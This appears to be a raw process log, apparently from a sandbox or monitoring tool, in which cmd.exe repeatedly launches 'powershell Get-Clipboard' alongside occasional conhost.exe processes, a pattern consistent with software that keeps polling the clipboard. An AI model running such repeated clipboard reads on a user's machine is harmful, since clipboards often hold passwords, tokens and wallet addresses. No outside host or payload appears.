C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
